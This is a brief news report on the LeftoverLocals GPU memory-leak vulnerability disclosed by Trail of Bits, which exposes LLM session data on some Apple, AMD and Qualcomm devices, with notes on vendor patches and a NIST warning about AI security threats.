Researchers from security firm Trail of Bits have uncovered a critical vulnerability in the graphic processing units (GPUs) of Apple, AMD, and Qualcomm devices. The flaw, known as LeftoverLocals, allows attackers to access data from large language models by exploiting the lack of isolation of kernel memory in the affected devices. By writing GPU kernel code, an attacker can prompt the targeted devices to dump data from memory. The researchers used the open-source LLM model llama.cpp and the programming language OpenCL to orchestrate the hack. They were able to access 181 megabytes of LLM query data and reproduce chat sessions, granting access to model parameters and outputs. The researchers warn that implementing these attacks is accessible to amateur programmers and that open-source language models are particularly vulnerable to this type of exploit. Apple has released limited patches for the flaw, while Qualcomm and AMD are still evaluating the vulnerability. This discovery aligns with an alert from the U.S. National Institute of Standards and Technology warning of cyber threats to AI models due to prompt injection and data leak vulnerabilities. The NIST states that protecting AI from misdirection is currently a challenge due to the complexity of the software environment and the large datasets used in training AI.